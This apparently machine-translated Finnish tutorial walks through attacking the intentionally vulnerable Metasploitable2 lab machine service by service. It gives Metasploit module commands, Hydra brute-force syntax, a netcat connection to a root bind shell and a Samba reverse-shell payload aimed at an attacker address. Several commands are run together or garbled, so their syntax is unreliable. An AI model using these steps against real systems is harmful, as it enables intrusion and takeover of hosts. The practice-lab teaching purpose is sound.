- Metasploitable2 Täydellinen yleiskatsaus
- Hyödynnetään kaikkia portteja eri tekniikoilla :
- 22-SSH
- 23-TELNET
- 25-SMTP
- Method 2
- 139&445 Netbios-SSN
- 1099-Java-RMI
- Hyökkäys java-RMI-palvelimen
- 1524-BINDSHELL
- Hyökkäys
- 2121-ProFTPD
- 3306-MYSQL
- 3632-DISTCCD
- Hyödyntämällä porttia 3632 distcc:n avulla-exec
- Exploiting PostgreSQL with postgre_payload
- 5900-VNC
- 6000-X11
- Portin 6000 hyväksikäyttö ssh:n avulla
- 6667 & 6697 UnrealIRCD
- Menetelmä 1: portissa 6667
- Method 2: Try to Exploit this…Happy learning 8180-TOMCAT
- Apache-Tomcatin hyödyntäminen
- 8787-Ruby-drb
Metasploitable2 Täydellinen yleiskatsaus
Metasploitable on tarkoituksellisesti haavoittuva Linux-virtuaalikone.
Tätä VM:ää voidaan käyttää tietoturvakoulutuksen suorittamiseen, tietoturvatyökalujen testaamiseen ja yleisten tunkeutumistestaustekniikoiden harjoitteluun.
Asennus ja konfigurointi
Olemme tässä hyödyntämässä Metasploitable 2:ta (pahuksen haavoittuva kone tunkeutumistestausta varten)
Hanki tämä Metasploiable2-kone osoitteesta https://information.rapid7.com/download-metasploitable-2017.html
Asennusprosessi:
- Avaa VirtualBox ja klikkaa ”New” painiketta luodaksesi uuden virtuaalikoneen
- Kirjoita virtuaalikoneen nimi(Metasploitable2)
- Varaa muistin määrä(mieluiten, mutta ei alle 512mb)
- Valitse Käytä olemassa olevaa kiintolevytiedostoa
- Valitse Rapid7:lta lataamasi vmdk-tiedosto
- Klikkaa Create…!!! Onnistui Metasploitable2:n asennus, Nyt on aika määrittää verkkoasetukset.
Asennuksen jälkeen vaihda verkkosovittimen asetukset seuraavasti :
In-Network Setting: Settings/Network/Adapter Select Ethernet or Wireless
In Advanced tab Select: Promiscuous Mode as Allow All
Käynnistä Metasploitable2-kone ja yritä kirjautua sisään annetuilla tunnuksilla Banneriin…!!!!
Löydä koneen IP-osoite käyttämällä seuraavaa komento terminaalissa
ifconfig
Tämä on kaikki asennusta varten….Aloitetaan hakkerointi…
Skannaus
Skannaus Matasploitable 2
Kuten huomasimme koneen IP-osoite on 192.168.0.130
Aloitetaan skannaus Nmapilla, joka on osa Kali Linuxia
nmap -sV -p- 192.168.0.130
Hyödynnetään kaikkia portteja eri tekniikoilla :
Method 1:
Login with Anonymous as username and no password.
Jos tarvitset lisätietoa Anonymous FTP:stä, löydät sen täältä.
https://whatis.techtarget.com/definition/anonymous-FTP-File-Transfer-Protocol
ftp 192.168.0.130
Käyttäjätilin kirjautumisen jälkeen voit saada pääkäyttäjän oikeudet (root-oikeudet) tekemällä Privilege escalation.
Menetelmä 3 :
Exploita FTP:tä Metasploit-kehyksen kautta
avaa Metasploit-kehyksen konsoli ja etsi vsftpd Backdoor -hyödyntäminen
msfconsole
Search vsftpd
use exploit/unix/ftp/vsftpd_234_backdoor
.
show options
set RHOSTS 192.168.0.130 --> <target IP address>exploit
Onneksi olkoon, että sait pääkäyttäjän oikeudet
22-SSH
Secure Shell (SSH) on kryptografinen verkkoprotokolla, jolla voidaan käyttää verkkopalveluja turvallisesti suojaamattoman verkon yli.
SSH:n hyödyntäminen eri tekniikoilla
Metodi 1
Käyttäjätunnuksen ja salasanan murtaminen Hydralla
Hydra on Kali-Linuxin sisäänrakennettu työkalu, jota käytetään Brute force -hyökkäykseen Brute force -hyökkäys on sovellusohjelmien käyttämä kokeilemalla ja erehtymällä suoritettava menetelmä, jolla pyritään purkamaan salattuja tietoja, kuten salasanoja tai DES-avaimia, käyttämällä tyhjentäviä ponnisteluja (käyttäen brute force -menetelmää) älykkäiden strategioiden käyttämisen sijaan.
hydra -L <Usernames_List> -P <Passwords_List> <Target ip address> <Service>
Menetelmä 2
Avaa Metasploit-kehys
Avaa päätelaite ja näppäile nämä komennot :
service postgresql startmsfconsolesearch ssh_loginuse auxiliary/scanner/ssh/ssh_login
aseta tämä apuvälineohjelma, ja katso, mitä se vaatii.
set RHOSTS <target IP Address> --> in my case 192.168.0.130
Aseta valmiiksi määritetty Käyttäjätunnusten lista ja Salasanojen lista
set USER_FILE <Username file Path>set PASS_FILE <Password file Path>exploit
Se ottaa aikapohjaisesti käyttäjätunnusten ja salasanojen listan ja Se Ilmoittaa Käyttäjätunnus: Salasana ja kirjaudu sisään näillä tunnuksilla.
ssh username@targetipaddress
Sinulla on käyttäjäoikeudet, et voi suorittaa kaikkia tehtäviä, joten yritä saada pääkäyttäjäoikeus tekemällä Privilege escalation.
23-TELNET
Telnet on yksinkertainen, tekstipohjainen verkkoprotokolla, jota käytetään etätietokoneiden käyttämiseen TCP/IP-verkoissa, kuten Internetissä. Telnet luotiin ja lanseerattiin vuonna 1969, ja historiallisesti voidaan sanoa, että se oli ensimmäinen Internet.
telnet <target IP Address> --> 192.168.0.130
Esimerkkinä se nappaa Metasploitable 2 -bannerin, se näyttää, että Kirjaudu sisään komennolla msfadmin/msfadmin saadaksesi alun perin. Syötä vain nuo tunnukset niin olet sisällä.
25-SMTP
SMTP on osa TCP/IP-protokollan sovelluskerrosta. Käyttämällä prosessia nimeltä ”tallenna ja lähetä eteenpäin” SMTP siirtää sähköpostisi verkoissa ja niiden välillä. Se tekee tiivistä yhteistyötä postinsiirtoagentin (MTA) kanssa lähettääkseen viestisi oikeaan tietokoneeseen ja sähköpostilaatikkoon.
Menetelmä 1:
Käyttämällä Metasploitia
Käynnistä Metasploit suorittamalla komennot
service postgresql startmsfconsole -qsearch smtp_version
.
use auxiliary/scanning/smtp/smtp_version (or) you can type use 0show optionsset RHOST 192.168.0.130exploit (or) runshow optionsset RHOST 192.168.0.130exploit (or) run
SMTP on lyhenne sanoista Simple Mail Transport Protocol (yksinkertaisen postin kuljetusprotokolla).palvelimelta-palvelimelle-protokolla ja pitää paikallista tietokantaa käyttäjistä, joille sen on lähetettävä ja vastaanotettava sähköposteja.
SMTP:llä on joukko komentoja. Otamme yhteyden kohteeseemme ”netcatilla” portin 25 kautta ja yritämme hankkia tämän tietokannan sähköpostit.
Avaa uusi terminaali ja kirjoita:
nc 192.168.0.130 25
Nyt kun yhteys on muodostettu, voit todentaa sen ”SMTP”-komennoilla
Type: vrfy user
vrfy (Tämä ei oleinteraktiivinen komentotulkki)
SMTP-komentoja varten käy osoitteessa: http://www.tcpipguide.com/free/t_SMTPCommands-2.htm
Method 2
Using smtp_enum
This is can be done by Metasploit
search smtp_enum
.
use auxiliary/scanner/smtp/smtp_enum
show optionsset RHOST 192.168.0.130exploit
Tässä metodissa käytetään enumeraatiota, jolla saadaan selville tämä SMTP-palvelun käyttäjälista.
Myöhemmin NetCat voi auttaa saamaan käänteisen yhteyden kyseiseen käyttäjään.
139&445 Netbios-SSN
Samba on avoimen lähdekoodin projekti, jota käytetään laajalti Linux- ja Unix-tietokoneissa, jotta ne voivat työskennellä Windowsin tiedosto- ja tulostuspalveluiden kanssa.
Voidaan käyttää Sambaa jopa Active-palvelimena hoitamaan kirjautumista, todennusta ja pääsynvalvontaa Windows-verkkoon.
Hyökkäyksen etsiminen
use exploit/multi/samba/usermap_script
Hyökkäyksen vaihtoehtojen tarkasteleminen
.
Hyötykuorman asettaminen
Show payloadsSet payload cmd/unix/reverse
Hyötykuorman edellyttämien argumenttien asettaminen
.
Show optionsSet LHOST 192.168.0.109 (Attackers IP Address)Set LPORT 4444
Tarkista, kun kaikki vaaditut argumentit on täytetty
exploit
1099-Java-RMI
Remote Method Invocation (RMI) on API, jonka avulla objekti voi kutsua metodia toisessa osoiteavaruudessa olevalle objektille, joka voi olla samassa koneessa tai etäkoneessa.
Hyökkäys java-RMI-palvelimen
haku
search java_rmi_server
Valitse käyttökohde niiden luokituksen mukaan. esimerkiksi ”erinomainen” toimii paremmin kuin ”normaali”.
use exploit/multi/misc/java_rmi_servershow optionsset RHOSTS <target's IP>exploit
Simme pääsyn kohdekoneeseen.
1524-BINDSHELL
Sidekuori (Bind shell) on kuorityyppi, jossa kohdekone avaa uhrikoneeseen tietoliikennöintiportin tai kuuntelijan, ja se odottaa saapuvaa yhteyttä. Tämän jälkeen hyökkääjä muodostaa yhteyden uhrikoneen kuuntelijaan, joka sitten johtaa koodin tai komennon suorittamiseen palvelimella.
Hyökkäys
Se on root-kuori, joten voimme muodostaa yhteyden netcat-palvelun kautta.
nc <target ip address> 1524
Onnittelut, olet nyt pääkäyttäjä.
2121-ProFTPD
Ennen tämän portin hyväksikäyttöä tarvitset kirjautumistiedot, joten kuten tiedämme menetelmän saat sen Brute-force-tekniikalla, Pääsemme ProFTPd:hen telnetillä, Käytämme täällä käyttäjää: user.
telnet <Taget IP Address> <Port Number>USER <username>
PASS <password>
Se on normaali käyttäjä, Kokeile Privilege Escalationia saadaksesi pääkäyttäjän hallinnan.
3306-MYSQL
Menetelmä 1:
Haeat for the exploit
search scanner/mysql/mysql_login
use auxiliary/scanner/mysql/mysql_login
.
Joskus saattaa olla mahdollista, että MySQL:n salasana on tyhjä. Voimme siis hyödyntää sitä suoraan.
Huomaa: oletusarvoisesti se näyttää BLANK_PASSWORDS:n vääräksi, aseta se true:ksi.
set BLANK_PASSWORDS as true
Menetelmä:2
Tässä menetelmässä aiomme hyväksikäyttää MySQL:ää käyttämällä tätä komentoa antaen käyttäjänimen root ja kohteen IP:n.
mysql -u root -h <target's IP>
3632-DISTCCD
Distcc on työkalu, jonka avulla voidaan nopeuttaa lähdekoodin kääntämistä käyttämällä hajautettua tietojenkäsittelyä tietoverkossa. Oikealla konfiguraatiolla
distcc voi lyhentää projektin kääntämisaikaa dramaattisesti
Hyödyntämällä porttia 3632 distcc:n avulla-exec
Avaa msfconsole ja etsi distcc_exec
search distcc_execshow options
Aseta tarvittavat argumentit hyväksikäyttöä varten
set RHOSTS <target-ip>exploit
Saimme Shell-käytön…yritetään tehdä privilege escalation for Higher privilege
Exploiting PostgreSQL with postgre_payload
Open msfconsole & search for postgres_payload
.
search postgres_payloaduse exploit/linux/postgres/postgres_payloadshow options
Aseta vaadittavat argumentit hyväksikäyttöä varten
set RHOSTS <target-ip>
Oletuksena, se käyttää käyttäjätunnuksena postgres
exploit
Suoritti onnistuneen kirjautumisen postgresql…Hankitaan shell, jolla voi tehdä lisää juttuja…
Yritetään tehdä privilege escalation…Hyvää oppimista..!!!
5900-VNC
Avaa msfconsole ja etsi exploit vnc_login
search vnc_loginuse auxiliary/scanner/vnc/vnc_login
show optionsset RHOSTS <targets IP>set PASS_FILE <filepath that contains passwords>run (or) exploit
Menetelmää käytetään Linux- tai Unix- tai Windows-käyttöjärjestelmissä isännöityjen VNC-ohjelmistojen hyväksikäyttöön todennushaavoittuvuudella.
Yritä muodostaa vnc-yhteys kyseisellä salasanalla
Avaa Vnc Viewer terminaalissa & Kirjoita IP-osoite ja muodosta yhteys
kirjautumiskehote ponnahtaa esiin. ja pyytää antamaan tunnukset
Sitten syötä salasana ja valitse OK.
Voilaaa…!!! Sinulla on Access…Tiedän mitä ajattelet juuri nyt…Älä sotke asioita ympärillä..hyvää oppimista.
6000-X11
X Window System (eli X) on UNIX-pohjaisissa käyttöjärjestelmissä yleinen bittikarttanäytöille tarkoitettu ikkunointijärjestelmä. X tarjoaa peruspuitteet graafiseen käyttöliittymään perustuvalle ympäristölle.
X11-etäkäyttöinen palvelin ottaa yhteyksiä vastaan mistä tahansa, mihin saa Internet-yhteyden. Se vastaa pääsystä näytönohjaimiin, syöttölaitteisiin ja näyttöön joko tietokoneella tai langattomalla laitteella.
Portin 6000 hyväksikäyttö ssh:n avulla
ssh -X -l msfadmin 192.168.0.122
Yllä olevassa komennossa ’X’ ottaa käyttöön kaikki porttien välitykset, antamalla käyttäjätunnus ja kohteen IP antaa meille komentotulkin
6667 & 6697 UnrealIRCD
UnrealIRCd on avoimen lähdekoodin IRC-palvelin, joka on palvellut tuhansia verkoissa vuodesta 1999 lähtien. Se toimii Linuxissa, OS X:ssä ja Windowsissa
UnrealIRCd on erittäin kehittynyt IRCd, jossa keskitytään vahvasti modulaarisuuteen, kehittyneeseen ja hyvin konfiguroitavaan asetustiedostoon. Tärkeimpiin ominaisuuksiin kuuluu SSL
UnrealIRCd on yksi suosituimmista ja monipuolisimmista IRC-daemoneista, ja sitä käytetään suurimmassa osassa IRC-palvelimia
Tämän palvelimen on kuvailtu sisältävän mahdollisesti eniten tietoturvaominaisuuksia kaikista IRC-palvelimista.
Käytetyt protokollat:
Hyödynnetään tätä IRC-palvelinta.
Menetelmä 1: portissa 6667
search unrealircduse exploit/unix/irc/unreal_ircd_3281_backdoorshow options
Asetetaan tarvittavat argumentit hyväksikäyttöä varten
set RHOSTS <target-ip>
.
oletusarvoisesti exploit
run (or) exploit
Heyyy…We got root…We are living on the edge…
Method 2: Try to Exploit this…Happy learning
8180-TOMCAT
Apache Tomcat on avoimen lähdekoodin toteutus Java Servlet-, JavaServer Pages-, Java Expression Language- ja WebSocket-teknologioista. Tomcat tarjoaa ”puhdas Java” HTTP-verkkopalvelinympäristön, jossa voidaan suorittaa Java-koodia.
Apache-Tomcatin hyödyntäminen
Se voidaan suorittaa kahdessa vaiheessa:
Avaa msfconsole & etsi hakusanalla tomcat_mgr_login
search tomcat_mgr_loginset RHOSTS <target-ip>
show options
Hyökkäys määrittelee oletusarvoisiksi asetetut käyttäjätunnukset & salasanojen listat. Kun olet asettanut argumentit exploitille Type exploit (tai) run
run
Vastaanottaa saman käyttäjätunnuksen ja salasanan ja antaa sen seuraavalle exploitille.
haku tomcat manager exploitit
search tomcat_mgr_uploaduse exploit/multi/http/tomcat_mgr_uploadshow options
Säädä RHOSTS, RPORT ja HttpPassword, HttpUsername, jotka saimme tomcatin kirjautumishyökkäyksen exploitista ja suorita sitten exploit.
msfconsole voisi määrittää sopivan hyötykuorman exploitille, Siksi saimme meterpreterin…
8787-Ruby-drb
dRuby on hajautettu oliojärjestelmä Rubylle. Se on kirjoitettu puhtaalla Rubyllä ja käyttää sen protokollaa.
Ei tarvita muita lisäpalveluita kuin ne, jotka Rubyn ajoaika tarjoaa, kuten TCP-socketit.
search drb_remote_codeexec
Aseta tarvittavat argumentit hyväksikäyttöä varten
show optionsset RHOSTS <target-ip>exploit (or) run
Onnittelut, että sait pääkäyttäjän pääkäyttäjän komentotulkkioikeudet… kokeile käyttää joitain komentotulkkikomentoja…